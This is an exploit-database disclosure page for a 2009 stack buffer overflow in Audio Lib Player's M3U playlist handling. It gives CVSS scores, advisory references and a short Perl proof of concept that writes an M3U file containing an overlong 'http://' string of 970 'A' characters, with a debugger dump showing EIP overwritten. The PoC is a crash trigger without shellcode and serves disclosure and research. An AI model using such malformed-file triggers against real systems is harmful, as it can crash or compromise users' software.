Audio Lib Player (M3U File) Local Stack Overflow PoC

2009-09-17 / 2009-09-18
Credit: Cyber-Zone
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl # # # # Audio Lib Player (M3U File) Local Stack Overflow PoC # # download : http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm # Found By : Cyber-Zone (ABDELKHALEK) # # # Greatz : All friends (Jiko :)) Sec-r1z.CoM r1z ... Todd and Packet Storm ;) # #olly #EAX FFFFFFFF #ECX 000038D9 #EDX 0012F70C #EBX 00000068 #ESP 0012FF00 #EBP 41414141 #ESI 0012FF10 #EDI 00000008 #EIP 41414141 # my $Header = "#EXTM3U\n"; my $ex="http://"."A" x 970; # Random open(MYFILE,'>>cyber.m3u'); print MYFILE $Header.$ex; close(MYFILE); _________________________________________________________________ Avec Windows Live, vous organisez, retouchez et partagez vos photos. http://www.microsoft.com/northafrica/windows/windowslive/products/photo-gallery-edit.aspx

References:

http://xforce.iss.net/xforce/xfdb/51873
http://www.vupen.com/english/advisories/2009/1963
http://www.osvdb.org/56047
http://secunia.com/advisories/35867
http://packetstormsecurity.org/0907-exploits/alp-overflow.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top